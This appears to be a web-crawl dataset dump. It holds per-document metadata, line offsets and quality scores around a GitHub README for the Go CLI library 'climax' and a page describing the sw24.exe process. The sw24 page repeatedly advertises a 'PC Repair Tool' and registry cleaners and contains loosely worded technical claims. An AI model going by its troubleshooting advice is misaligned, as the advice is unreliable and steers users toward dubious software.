3630,
3704,
3784,
3860,
3936,
3985,
4038,
4093,
4153,
4239,
4244,
4245,
4411,
4412,
4439,
4469,
4474,
4613,
4614,
4655,
4693,
4765,
4770,
4771,
4827,
4828,
5037,
5038,
5205,
5206,
5262,
5263,
5283,
5284,
5322,
5323,
5376,
5377,
5560,
5561,
6138,
6139,
6176,
6177,
6230,
6231,
6492,
6493,
6494,
6628,
6629,
6662,
6696,
6697,
6743,
6744,
6827,
6828,
6907,
6908,
6997,
6998,
7008,
7009,
7128,
7129,
7193,
7194,
7489,
7490,
7496,
7497,
7599,
7600,
7965,
7966,
8007,
8008,
8091,
8092,
8163,
8164,
8261,
8262,
8329,
8401,
8406,
8407,
8473,
8474,
8542,
8609,
8614,
8615,
8636,
8637,
8785,
8786,
8814,
8815,
9171,
9172,
9178,
9179,
9339,
9340,
9689,
9690,
9742,
9793,
9794,
9824,
9825,
10133,
10134,
10187,
10188,
10257,
10258,
10423,
10424,
10430,
10431,
10640,
10641,
10719,
10720,
10774,
10775,
10785,
10786,
10853,
10854,
10911,
10912,
11478,
11479,
11721,
11722,
11947,
11948,
12002,
12003,
12050,
12051,
12086,
12170,
12205,
12289,
12347,
12348,
12467,
12468,
12526,
12527,
12585,
12587,
12622,
12706,
12741,
12814,
12872,
12873,
13211,
13212,
13222,
13223,
13263,
13264,
13463,
13464,
13469,
13471,
13511,
13538,
13540,
13541,
13756,
13757,
13767,
13768,
13831,
13832,
14346,
14347,
14780,
14781,
14853,
14854,
14891,
14892,
14954,
14955,
14993,
14994,
15004,
15005,
15072,
15073,
15120,
15121,
15353,
15354,
15390,
15391,
15456,
15457,
15537,
15538,
15793,
15794,
15835,
15882,
15883,
16039,
16040,
16081,
16126,
16127,
16231,
16232,
16273,
16314,
16315,
16398,
16399,
16467,
16534,
16535,
16721,
16722,
16728,
16729,
16872,
16873,
16930,
16931,
17151,
17152,
17212,
17213,
17269,
17270,
17315,
17316,
17409,
17410,
17486,
17511,
17515,
17518,
17594,
17617,
17639,
17653,
17655,
17656,
17995,
17996,
18048,
18049,
18449,
18450,
18920,
18921,
18994,
18995,
19050,
19051,
19113,
19114,
19174,
19175,
19246,
19247,
19306,
19307,
19321,
19322,
19420,
19421,
19471,
19472,
19687,
19688,
20186,
20187,
20542,
20543,
20600,
20601,
20960,
20961,
21065,
21066,
21100,
21132,
21133,
21271,
21272,
21443,
21444,
21495,
21496,
21558,
21559,
21659,
21660,
21704,
21705,
21778,
21779,
21997,
21998,
22283,
22284,
22290,
22291,
22457,
22458,
22468,
22469,
22653,
22654,
22709,
22710,
23008,
23009,
23377,
23378,
23585,
23586,
23637,
23638,
23679,
23724,
23725,
23735,
23736,
23802,
23803,
23954,
23955,
24001,
24002,
24136,
24137,
24186,
24187,
24270,
24271,
24368,
24369,
24444,
24445,
24453,
24459,
24501,
24550,
24611,
24617,
24622,
24652,
24653,
24851,
24852,
24928,
25004,
25080,
25161,
25238,
25293,
25324,
25329,
25330,
25580,
25581,
25775,
25776,
25966,
25967,
26017,
26092,
26140,
26141,
26151,
26152,
26277,
26278,
26337,
26338,
26722,
26723,
26780,
26781,
26785,
26787,
26825,
26870,
26927,
26944,
27008,
27040,
27042,
27043,
27235,
27236,
27294,
27295,
27299,
27301,
27339,
27384,
27441,
27490,
27554,
27612,
27614,
27615,
27763,
27764,
27786,
27787,
28066,
28067,
28145,
28146,
28442,
28443,
28497,
28498,
28700,
28701,
28740,
28741,
29046,
29047,
29520,
29521,
29930,
29931,
30246,
30247,
30257,
30258,
30293,
30294,
30527,
30528,
30580,
30581,
30619,
30620,
30856,
30857,
30896,
30963,
30968,
31050,
31051,
31093,
31098,
31099,
31346,
31347,
31392,
31397,
31398,
31481,
31482,
31520,
31525,
31558,
31559,
31629,
31630,
31649,
31654,
31738,
31739,
31766,
31771,
31772,
31807,
31808,
32161,
32162,
32401,
32402,
32437,
32438,
32883,
32884,
33173,
33174,
33328,
33329,
33371,
33372,
33441,
33442,
33489,
33490,
33500,
33501,
33717,
33718,
33826,
33827,
33849,
33850,
33860,
33861,
34037,
34038,
34152,
34153,
34177,
34178,
34188,
34189,
34397,
34398,
34516,
34517,
34549,
34550,
34560,
34561,
34600,
34601,
34864,
34865,
34909,
34910,
34920,
34921,
34960,
34961,
34975,
34976,
34986,
34987,
35026,
35027,
35042,
35043,
35053,
35054,
35399,
35400,
35877,
35878,
35959,
35960,
35961,
36232,
36233,
36287,
36288,
36577,
36578,
37003,
37004,
37169,
37170,
37226,
37227,
37822,
37823,
37855,
37856,
38042,
38043,
38247,
38248,
38348,
38349,
38563,
38564,
38627,
38628,
38674,
38675,
38702,
38703,
38707,
38708,
38885,
38886,
38980,
38981,
39067,
39068,
39179,
39180,
39371,
39372,
39793,
39794,
39816,
39817,
39821,
39822,
39988,
39989,
40019,
40020,
40023,
40024,
40177,
40178,
40541,
40542,
40543,
40553,
40554,
40731,
40732,
40795,
40796,
41108,
41109,
41591,
41592,
41668,
41669,
41753,
41754,
41810,
41811,
41911,
41912,
42053,
42054,
42659,
42660,
43105,
43106,
43119,
43148,
43180,
43223,
43296,
43319,
43378,
43448,
43449,
43516,
43517,
43857,
43858,
44130,
44131,
44240,
44241,
44371,
44372,
44483,
44484,
44737,
44738,
44795,
44796,
44990,
44991,
45049,
45050,
45268,
45269,
45302,
45303,
45552,
45553,
45720,
45721,
45760,
45767,
45889,
45890,
45914,
45956,
45984,
45991,
46054,
46055,
46092,
46093,
46162,
46163,
46284,
46285,
46339,
46346,
46484,
46485,
46508,
46550,
46578,
46585,
46652,
46653,
46804,
46805,
46953,
46954,
47040,
47041,
47098,
47099,
47136,
47173,
47178,
47179,
47351,
47352,
47534,
47535,
47568,
47569,
47724,
47725,
47823,
47824,
47858,
47863,
48021,
48022,
48167,
48168,
48228,
48233,
48298,
48303,
48365,
48366,
48414,
48419,
48420,
48474,
48475,
48716,
48717,
48755,
48756,
49138,
49139,
49223,
49224,
49373,
49374,
49409,
49410,
49785,
49786,
50162,
50163,
50203,
50204,
50609,
50610,
50711,
50712,
50855,
50856,
51085,
51086,
51237,
51238,
51432,
51433,
51540,
51541,
51878,
51879,
52138,
52139,
52149,
52150,
52242,
52243,
52300,
52301,
52544,
52545,
52556,
52557,
52927,
52928,
52956,
52957,
53313,
53314,
53337,
53338,
53597,
53598,
53684,
53685,
53960,
53961,
54221,
54222,
54262,
54263,
54555,
54556,
54566,
54567,
54634,
54635,
54683,
54684,
55061,
55062,
55263,
55264,
55573,
55574,
56176,
56177,
56269,
56270,
56314,
56315,
56368,
56369,
56775,
56776,
56929,
56930,
56987,
56988,
57254,
57255,
57286,
57287,
57424,
57425,
57461,
57462,
57624,
57625,
57864,
57865,
57871,
57872,
58377,
58378,
58410,
58411,
58637,
58638,
58670,
58671,
58956,
58957,
59007,
59008,
59061,
59062,
59071,
59072,
59270,
59271,
59284,
59285,
59349,
59350,
59361,
59362,
59405,
59406,
59407,
59780,
59781,
59851,
59852,
59945,
59946,
60113,
60114,
60124,
60125,
60329,
60434,
60435,
60441,
60442,
60686,
60687,
60838,
60839,
60888,
60926,
60927,
61166,
61167,
61289,
61290,
61313,
61342,
61343,
61353,
61354,
61483,
61484,
61552,
61553,
61788,
61789,
61795,
61796,
62143,
62144,
62218,
62219,
62501,
62502,
62528,
62529,
62564,
62565,
62634,
62635,
62670,
62671,
62949,
62950,
63269,
63270,
63339,
63340,
63585,
63586,
63682,
63683,
63721,
63755,
63799,
63800,
64065,
64066,
64128,
64129,
64164,
64165,
64172,
64173,
64200,
64201,
64205,
64206,
64214,
64215,
64231,
64232,
64267,
64268,
64270,
64271,
64281,
64282,
64298,
64299,
64334,
64335,
64337,
64338,
64347,
64348,
64364,
64365,
64400,
64401,
64416,
64417,
64424,
64425,
64441,
64442,
64481,
64482,
64497,
64498,
64507,
64508,
64524,
64525,
64564,
64565,
64580,
64581,
64588,
64589,
64605,
64606,
64637,
64638,
64640,
64641,
64648,
64649,
64665,
64666,
64701,
64702,
64719,
64720,
64721,
65060,
65061,
65433,
65434,
65466,
65467,
65623,
65624,
65658,
65659,
65742,
65743,
65845,
65846,
65892,
65893,
65923,
65928,
65929,
65985,
65986,
66064,
66102,
66107,
66173,
66174,
66212,
66217,
66218,
66228,
66229,
66316,
66317,
66366,
66367,
66495,
66496,
66538,
66539,
66756,
66757,
67300,
67301,
67356,
67357,
68039,
68040,
68050,
68051,
68105,
68106,
68414,
68415,
68927,
68928,
69313,
69314,
69324,
69325,
69371,
69372,
69487,
69488,
69536,
69537,
69620,
69621,
69705,
69706,
69909,
69910,
69951,
69986,
69991,
69992,
70002,
70003,
70060,
70061,
70258,
70259,
70303,
70304,
70716,
70717,
71037,
71038,
71057,
71058,
71296,
71297,
71656,
71657,
72033,
72034,
72329,
72330,
72659,
72660,
73066,
73067,
73471,
73472,
73508,
73509,
73777,
73778,
73784,
73785,
74012,
74013,
74318,
74319,
74904,
74905,
75275,
75276,
75286,
75287,
75321,
75322,
75476,
75477,
75661,
75662,
75875,
75876,
76187,
76188,
76431,
76432,
77011,
77012,
77470,
77471,
77608,
77609,
77631,
77632,
77958,
77959,
78156,
78157,
78324,
78325,
78619,
78620,
78630,
78631,
78722,
78723,
78749,
78750,
79242,
79243,
79751,
79752,
79761,
79762,
80014,
80015,
80338,
80339,
80345,
80346,
80717,
80765,
80766,
81277,
81278,
81339,
81340,
81575,
81576,
81876,
81877,
82158,
82159,
82220,
82221,
82339,
82340,
82482,
82483,
82623,
82624,
82787,
82788,
82798,
82799,
82999,
83331,
83332,
83342,
83343,
83437,
83628,
83629,
84063,
84064,
84354,
84355,
84364,
84365,
84705,
84775,
84776,
85374,
85375,
85440,
85441,
85572,
85573,
86066,
86067,
86560,
86561,
86631,
86632,
87061,
87062,
87306,
87307,
87374,
87375,
87444,
87445,
87567,
87568,
87685,
87686,
87807,
87808,
87912,
87913,
87989,
87990,
88043,
88044,
88225,
88226,
88325,
88326,
88501,
88502,
88781,
88782,
88788,
88789,
88852,
88853,
88881,
88882,
88924,
88925,
88954,
88955,
89161,
89162,
89275,
89276,
89342,
89347,
89348,
89427,
89428,
89495,
89496,
89529,
89534,
89603,
89604,
89802,
89803,
89845,
89850,
89851,
89933,
89934,
89975,
89980,
89981,
90113,
90114,
90395,
90396,
90665,
90666,
90695,
90696,
90726,
90727,
90828,
90829,
90859,
90860,
90906,
90907,
91130,
91131,
91158,
91159,
91203,
91204,
91367,
91368,
91413,
91414,
91496,
91497,
91543,
91548,
91549,
91614,
91615,
91690,
91695,
91696,
91706,
91707,
91778,
91779,
92021,
92022,
92147,
92148,
92254,
92255,
92619,
92620,
92710,
92711,
92882,
92883,
93042,
93043,
93216,
93217,
93304,
93305,
93427,
93428,
93758,
93759,
93804,
93805,
94175,
94176,
94596,
94597,
94655,
94656,
94901,
94902,
94912,
94913,
94969
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 94969,
"ccnet_original_nlines": 1445,
"rps_doc_curly_bracket": 0.00023165000311564654,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.34569963812828064,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0851723700761795,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12710246443748474,
"rps_doc_frac_unique_words": 0.09798309952020645,
"rps_doc_mean_word_length": 5.188198566436768,
"rps_doc_num_sentences": 673,
"rps_doc_symbol_to_word_ratio": 0.001431470038369298,
"rps_doc_unigram_entropy": 5.657927989959717,
"rps_doc_word_count": 14676,
"rps_doc_frac_chars_dupe_10grams": 0.0530981607735157,
"rps_doc_frac_chars_dupe_5grams": 0.2702319324016571,
"rps_doc_frac_chars_dupe_6grams": 0.1882403939962387,
"rps_doc_frac_chars_dupe_7grams": 0.1285361647605896,
"rps_doc_frac_chars_dupe_8grams": 0.0926295593380928,
"rps_doc_frac_chars_dupe_9grams": 0.0785374715924263,
"rps_doc_frac_chars_top_2gram": 0.02442803978919983,
"rps_doc_frac_chars_top_3gram": 0.02542617917060852,
"rps_doc_frac_chars_top_4gram": 0.024703839793801308,
"rps_doc_books_importance": -7568.9619140625,
"rps_doc_books_importance_length_correction": -7568.9619140625,
"rps_doc_openwebtext_importance": -3986.689697265625,
"rps_doc_openwebtext_importance_length_correction": -3986.689697265625,
"rps_doc_wikipedia_importance": -3053.543212890625,
"rps_doc_wikipedia_importance_length_correction": -3053.543212890625
},
"fasttext": {
"dclm": 0.03332275152206421,
"english": 0.8229397535324097,
"fineweb_edu_approx": 2.1475672721862793,
"eai_general_math": 0.7391233444213867,
"eai_open_web_math": 0.41026771068573,
"eai_web_code": 0.6246911287307739
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.758",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.44",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "23",
"label": "Tutorial"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
7,970,120,579,918,262,000
|
Skip to content
tucnak/climax
master
Switch branches/tags
Code
Latest commit
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Climax
Climax is an alternative CLI that looks like Go command
GoDoc Travis
Climax is a handy alternative CLI (command-line interface) for Go apps. It looks pretty much exactly like the output of the default go command and incorporates some fancy features from it. For instance, Climax does support so-called topics (some sort of Wiki entries for CLI). You can define some annotated use cases of some command that would get displayed in the help section of corresponding command also.
Why creating another CLI?
I didn't like existing solutions (e.g. codegangsta/cli | spf13/cobra) either for bloated codebase (I dislike the huge complex libraries) or poor output style / API. This project is just an another view on the subject, it has slightly different API than, let's say, Cobra; I find it much more convenient.
A sample application output, Climax produces:
Camus is a modern content writing suite.
Usage:
camus command [arguments]
The commands are:
init starts a new project
new creates flavored book parts
Use "camus help [command]" for more information about a command.
Additional help topics:
writing markdown language cheatsheet
metadata intro to yaml-based metadata
realtime effective real-time writing
Use "camus help [topic]" for more information about a topic.
Here is an example of a trivial CLI application that does nothing, but provides a single string split-like functionality:
demo := climax.New("demo")
demo.Brief = "Demo is a funky demonstation of Climax capabilities."
demo.Version = "stable"
joinCmd := climax.Command{
Name: "join",
Brief: "merges the strings given",
Usage: `[-s=] "a few" distinct strings`,
Help: `Lorem ipsum dolor sit amet amet sit todor...`,
Flags: []climax.Flag{
{
Name: "separator",
Short: "s",
Usage: `--separator="."`,
Help: `Put some separating string between all the strings given.`,
Variable: true,
},
},
Examples: []climax.Example{
{
Usecase: `-s . "google" "com"`,
Description: `Results in "google.com"`,
},
},
Handle: func(ctx climax.Context) int {
var separator string
if sep, ok := ctx.Get("separator"); ok {
separator = sep
}
fmt.Println(strings.Join(ctx.Args, separator))
return 0
},
}
demo.AddCommand(joinCmd)
demo.Run()
Have fun!
About
Climax is an alternative CLI with the human face
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages
No packages published
Languages
|
{
"url": "https://github.com/tucnak/climax",
"source_domain": "github.com",
"snapshot_id": "crawl=CC-MAIN-2022-40",
"warc_metadata": {
"Content-Length": "210014",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:FSJXO6POGHGYLXH5JXFK3NTEMAO3AZ3F",
"WARC-Concurrent-To": "<urn:uuid:6c1c092f-665e-4a88-83b8-2d37dca3517a>",
"WARC-Date": "2022-10-03T14:25:34Z",
"WARC-IP-Address": "140.82.113.4",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:EEXKEIXGVHMZEMUCPHOI5H3PQBAEYZYM",
"WARC-Record-ID": "<urn:uuid:83a0f7f6-e9b9-47d7-8717-68cca670d640>",
"WARC-Target-URI": "https://github.com/tucnak/climax",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:52aee421-8c37-4044-9d8d-e00db4236a9b>"
},
"warc_info": "isPartOf: CC-MAIN-2022-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-167\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
16,
17,
31,
32,
39,
60,
65,
66,
80,
81,
87,
88,
98,
140,
145,
150,
172,
184,
186,
188,
190,
192,
194,
196,
198,
200,
202,
204,
206,
208,
210,
212,
214,
216,
218,
220,
221,
228,
229,
285,
286,
299,
300,
709,
710,
736,
737,
1041,
1042,
1043,
1089,
1090,
1131,
1132,
1139,
1140,
1167,
1168,
1186,
1187,
1221,
1262,
1263,
1328,
1329,
1353,
1354,
1396,
1438,
1479,
1480,
1541,
1542,
1664,
1665,
1692,
1760,
1784,
1785,
1812,
1828,
1864,
1906,
1962,
1963,
1986,
1990,
2016,
2034,
2066,
2140,
2159,
2164,
2168,
2169,
2198,
2202,
2241,
2284,
2289,
2293,
2294,
2334,
2357,
2400,
2419,
2423,
2424,
2473,
2474,
2485,
2489,
2491,
2492,
2517,
2528,
2529,
2539,
2540,
2546,
2547,
2596,
2597,
2607,
2608,
2616,
2617,
2623,
2624,
2633,
2634,
2640,
2641,
2650,
2651,
2673,
2674,
2683,
2684,
2706,
2707
],
"line_end_idx": [
16,
17,
31,
32,
39,
60,
65,
66,
80,
81,
87,
88,
98,
140,
145,
150,
172,
184,
186,
188,
190,
192,
194,
196,
198,
200,
202,
204,
206,
208,
210,
212,
214,
216,
218,
220,
221,
228,
229,
285,
286,
299,
300,
709,
710,
736,
737,
1041,
1042,
1043,
1089,
1090,
1131,
1132,
1139,
1140,
1167,
1168,
1186,
1187,
1221,
1262,
1263,
1328,
1329,
1353,
1354,
1396,
1438,
1479,
1480,
1541,
1542,
1664,
1665,
1692,
1760,
1784,
1785,
1812,
1828,
1864,
1906,
1962,
1963,
1986,
1990,
2016,
2034,
2066,
2140,
2159,
2164,
2168,
2169,
2198,
2202,
2241,
2284,
2289,
2293,
2294,
2334,
2357,
2400,
2419,
2423,
2424,
2473,
2474,
2485,
2489,
2491,
2492,
2517,
2528,
2529,
2539,
2540,
2546,
2547,
2596,
2597,
2607,
2608,
2616,
2617,
2623,
2624,
2633,
2634,
2640,
2641,
2650,
2651,
2673,
2674,
2683,
2684,
2706,
2707,
2716
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2716,
"ccnet_original_nlines": 141,
"rps_doc_curly_bracket": 0.005154639948159456,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0.00043196999467909336,
"rps_doc_stop_word_fraction": 0.2249070554971695,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.022304829210042953,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.282527893781662,
"rps_doc_frac_unique_words": 0.6197183132171631,
"rps_doc_mean_word_length": 5.5239434242248535,
"rps_doc_num_sentences": 34,
"rps_doc_symbol_to_word_ratio": 0.0018587399972602725,
"rps_doc_unigram_entropy": 5.146657466888428,
"rps_doc_word_count": 355,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.04895460978150368,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.018357979133725166,
"rps_doc_frac_chars_top_3gram": 0.010198879987001419,
"rps_doc_frac_chars_top_4gram": 0.021417640149593353,
"rps_doc_books_importance": -268.0666198730469,
"rps_doc_books_importance_length_correction": -268.0666198730469,
"rps_doc_openwebtext_importance": -151.29693603515625,
"rps_doc_openwebtext_importance_length_correction": -151.29693603515625,
"rps_doc_wikipedia_importance": -121.0979995727539,
"rps_doc_wikipedia_importance_length_correction": -121.0979995727539
},
"fasttext": {
"dclm": 0.4045097231864929,
"english": 0.7250443696975708,
"fineweb_edu_approx": 2.790370464324951,
"eai_general_math": 0.034265100955963135,
"eai_open_web_math": 0.19131088256835938,
"eai_web_code": 0.9827090501785278
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-6,458,375,229,734,323,000
|
sw24.exe Process Information
Process Name: sw24
Author: Unknown
Download PC Repair Tool & fix sw24.exe Windows errors automatically
System Process:
No
Uses network:
No
Hardware related:
No
Background Process:
Yes
Spyware:
No
Trojan:
No
Virus:
No
Security risk 0-5:
0
What is sw24 exe?
sw24.exe is a process
This executable file is an MSI D.O.T component.(Dynamic Over clocking Technology).
The “.exe” file extension stands for Windows executable file. Any program that is executable has the .exe file extension. Find out if sw24.exe is a virus and sould be removed, how to fix sw24.exe error, if sw24 exe is CPU intensive and slowing down your Windows PC. Any process has four stages of the lifecycle including start, ready, running, waiting, terminated or exit.
Should You Remove sw24 exe?
If you are asking yourself if it is safe to remove sw24.exe from your Windows system then it is understandable that it is causing trouble. sw24.exe is not a critical component and a non-system process. Any process that is not managed by the system is known as non-system processes. It is safe to terminate the non-system process as they do not affect the general functionality of the operating system. However, the program using the non-system processes will be either terminated or halted.
Download PC Repair Tool & fix sw24.exe Windows errors automatically
Fix sw24.exe Error?
There are many reasons why you are seeing sw24.exe error in your Windows system including:
Malicious software
Malicious software infects the system with malware, keyloggers, spyware, and other malicious actors. They slow down the whole system and also cause .exe errors. This occurs because they modify the registry which is very important in the proper functioning of processes.
Incomplete installation
Another common reason behind sw24.exe error is an incomplete installation. It can happen because of errors during installation, lack of hard disk space, and crash during install. This also leads to a corrupted registry causing the error.
Application conflicts and Missing or corrupt windows drivers can also lead to sw24.exe error.
The solution to fixing sw24.exe error include any one of the following
• Make sure your PC is protected with proper anti-virus software program.
• Run a registry cleaner to repair and remove the Windows registry that is causing sw24.exe error.
• Make sure the system’s device drivers are updated properly.
It is also recommended that you run a performance scan to automatically optimize memory and CPU settings.
Download PC Repair Tool & fix sw24.exe Windows errors automatically
Is a sw24.exe CPU intensive?
Windows process requires three resource types to function properly including CPU, Memory, and Network. CPU cycles to do computational tasks, memory to store information and network to communicate with the required services. If any of the resources are not available, it will either get interrupted or stopped.
Any given process has a process identification number(PID) associated with it. A user can easily identify and track a process using its PID. Task Manager is a great way to learn how much resources sw24.exe process is allocating to itself. It showcases process resource usage in CPU/Memory/Disk and Network. If you have a GPU, it will also showcase the percentage of GPU it is using to run the process.
|
{
"url": "https://www.liutilities.com/processlibrary/sw24/",
"source_domain": "www.liutilities.com",
"snapshot_id": "crawl=CC-MAIN-2021-31",
"warc_metadata": {
"Content-Length": "16468",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:LBPF5UALWQFGQGP2AMFYVNRSFWRYEWMB",
"WARC-Concurrent-To": "<urn:uuid:c869c044-062e-4422-ac24-1094bedfa7c6>",
"WARC-Date": "2021-07-28T23:54:51Z",
"WARC-IP-Address": "104.21.57.136",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:PNLRITNXDMC6ZKJJ7I6WZE3I3P6IFWLD",
"WARC-Record-ID": "<urn:uuid:e32f0b65-47d6-453e-a3eb-958b5d220b87>",
"WARC-Target-URI": "https://www.liutilities.com/processlibrary/sw24/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:51a4e2da-f868-4c1c-ac35-e5f58bf1b0f2>"
},
"warc_info": "isPartOf: CC-MAIN-2021-31\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July/August 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-235.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
29,
30,
49,
65,
66,
134,
135,
151,
154,
168,
171,
189,
192,
212,
216,
225,
228,
236,
239,
246,
249,
268,
270,
271,
289,
290,
312,
395,
396,
769,
770,
798,
799,
1290,
1291,
1359,
1360,
1380,
1381,
1472,
1473,
1492,
1762,
1786,
2024,
2025,
2119,
2120,
2191,
2192,
2268,
2369,
2433,
2434,
2540,
2541,
2609,
2610,
2639,
2640,
2950,
2951
],
"line_end_idx": [
29,
30,
49,
65,
66,
134,
135,
151,
154,
168,
171,
189,
192,
212,
216,
225,
228,
236,
239,
246,
249,
268,
270,
271,
289,
290,
312,
395,
396,
769,
770,
798,
799,
1290,
1291,
1359,
1360,
1380,
1381,
1472,
1473,
1492,
1762,
1786,
2024,
2025,
2119,
2120,
2191,
2192,
2268,
2369,
2433,
2434,
2540,
2541,
2609,
2610,
2639,
2640,
2950,
2951,
3352
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3352,
"ccnet_original_nlines": 62,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.31610941886901855,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0303951408714056,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1595744639635086,
"rps_doc_frac_unique_words": 0.4310019016265869,
"rps_doc_mean_word_length": 5.096408367156982,
"rps_doc_num_sentences": 56,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.94456148147583,
"rps_doc_word_count": 529,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.06231454014778137,
"rps_doc_frac_chars_dupe_6grams": 0.06231454014778137,
"rps_doc_frac_chars_dupe_7grams": 0.06231454014778137,
"rps_doc_frac_chars_dupe_8grams": 0.06231454014778137,
"rps_doc_frac_chars_dupe_9grams": 0.06231454014778137,
"rps_doc_frac_chars_top_2gram": 0.031157270073890686,
"rps_doc_frac_chars_top_3gram": 0.01780414953827858,
"rps_doc_frac_chars_top_4gram": 0.02225518971681595,
"rps_doc_books_importance": -250.21751403808594,
"rps_doc_books_importance_length_correction": -250.21751403808594,
"rps_doc_openwebtext_importance": -158.55325317382812,
"rps_doc_openwebtext_importance_length_correction": -158.55325317382812,
"rps_doc_wikipedia_importance": -105.83265686035156,
"rps_doc_wikipedia_importance_length_correction": -105.83265686035156
},
"fasttext": {
"dclm": 0.031175609678030014,
"english": 0.8963258862495422,
"fineweb_edu_approx": 2.25248122215271,
"eai_general_math": 0.13574081659317017,
"eai_open_web_math": 0.3173013925552368,
"eai_web_code": 0.04771285876631737
}
}
|
{
"free_decimal_correspondence": {
